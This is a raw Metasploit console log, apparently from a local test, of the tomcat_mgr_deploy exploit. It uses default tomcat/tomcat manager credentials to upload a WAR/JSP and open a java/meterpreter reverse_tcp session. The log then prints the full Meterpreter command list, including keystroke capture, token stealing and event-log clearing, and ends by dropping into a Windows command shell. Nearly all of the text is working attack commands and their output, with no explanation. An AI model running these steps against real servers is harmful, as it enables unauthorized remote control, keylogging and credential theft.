- msf exploit(tomcat_mgr_deploy) > show options
- Module options:
- Name Current Setting Required Description
- ---- --------------- -------- -----------
- PASSWORD tomcat no The password for the specified username
- PATH /manager yes The URI path of the manager app (/deploy and /undeploy will be used)
- Proxies no Use a proxy chain
- RHOST localhost yes The target address
- RPORT 8080 yes The target port
- USERNAME tomcat no The username to authenticate as
- VERBOSE false no Enable verbose output
- VHOST no HTTP server virtual host
- Payload options (java/shell/reverse_tcp):
- Name Current Setting Required Description
- ---- --------------- -------- -----------
- LHOST 127.0.0.1 yes The listen address
- LPORT 4444 yes The listen port
- Exploit target:
- Id Name
- -- ----
- 1 Java Universal
- msf exploit(tomcat_mgr_deploy) > set payload java/meterpreter/reverse_tcp
- payload => java/meterpreter/reverse_tcp
- msf exploit(tomcat_mgr_deploy) > exploit
- [*] Started reverse handler on 127.0.0.1:4444
- [*] Using manually select target "Java Universal"
- [*] SHELL set to cmd.exe
- [*] Uploading 6309 bytes as 6uD9BUvXfIr8OfmpwRvokVMxtdpHH.war ...
- [*] Executing /6uD9BUvXfIr8OfmpwRvokVMxtdpHH/tO3s8i.jsp...
- [*] Undeploying 6uD9BUvXfIr8OfmpwRvokVMxtdpHH ...
- [*] Sending stage (26938 bytes) to 127.0.0.1
- [*] Meterpreter session 2 opened (127.0.0.1:4444 -> 127.0.0.1:11545) at 2010-10-22 23:09:00 +0100
- meterpreter >
- meterpreter > help
- Core Commands
- =============
- Command Description
- ------- -----------
- ? Help menu
- background Backgrounds the current session
- bgkill Kills a background meterpreter script
- bglist Lists running background scripts
- bgrun Executes a meterpreter script as a background thread
- channel Displays information about active channels
- close Closes a channel
- exit Terminate the meterpreter session
- help Help menu
- interact Interacts with a channel
- irb Drop into irb scripting mode
- migrate Migrate the server to another process
- quit Terminate the meterpreter session
- read Reads data from a channel
- run Executes a meterpreter script
- use Load a one or more meterpreter extensions
- write Writes data to a channel
- Stdapi: File system Commands
- ============================
- Command Description
- ------- -----------
- cat Read the contents of a file to the screen
- cd Change directory
- del Delete the specified file
- download Download a file or directory
- edit Edit a file
- getlwd Print local working directory
- getwd Print working directory
- lcd Change local working directory
- lpwd Print local working directory
- ls List files
- mkdir Make directory
- pwd Print working directory
- rm Delete the specified file
- rmdir Remove directory
- search Search for files
- upload Upload a file or directory
- Stdapi: Networking Commands
- ===========================
- Command Description
- ------- -----------
- ipconfig Display interfaces
- portfwd Forward a local port to a remote service
- route View and modify the routing table
- Stdapi: System Commands
- =======================
- Command Description
- ------- -----------
- clearev Clear the event log
- drop_token Relinquishes any active impersonation token.
- execute Execute a command
- getpid Get the current process identifier
- getprivs Get as many privileges as possible
- getuid Get the user that the server is running as
- kill Terminate a process
- ps List running processes
- reboot Reboots the remote computer
- reg Modify and interact with the remote registry
- rev2self Calls RevertToSelf() on the remote machine
- shell Drop into a system command shell
- shutdown Shuts down the remote computer
- steal_token Attempts to steal an impersonation token from the target process
- sysinfo Gets information about the remote system, such as OS
- Stdapi: User interface Commands
- ===============================
- Command Description
- ------- -----------
- enumdesktops List all accessible desktops and window stations
- getdesktop Get the current meterpreter desktop
- idletime Returns the number of seconds the remote user has been idle
- keyscan_dump Dump the keystroke buffer
- keyscan_start Start capturing keystrokes
- keyscan_stop Stop capturing keystrokes
- screenshot Grab a screenshot of the interactive desktop
- setdesktop Change the meterpreters current desktop
- uictl Control some of the user interface components
- meterpreter > cat ...
- Unknown request detected:
- TLV_TYPE_METHOD = stdapi_railgun_api
- TLV_TYPE_REQUEST_ID = 56807978639825980098238633155564
- 0x24E21 = 0
- 0x44E22 = (raw data, 0 bytes)
- 0x44E23 = (raw data, 0 bytes)
- 0x44E24 = (raw data, 0 bytes)
- 0x14E29 = shell32
- 0x14E2A = IsUserAnAdmin
- meterpreter > shell
- Process 1 created.
- Channel 2 created.
- Microsoft Windows XP [Version 5.1.2600]
- (C) Copyright 1985-2001 Microsoft Corp.
- D:\Progs-Michi\apache-tomcat-6.0.26\bin>exit
- meterpreter >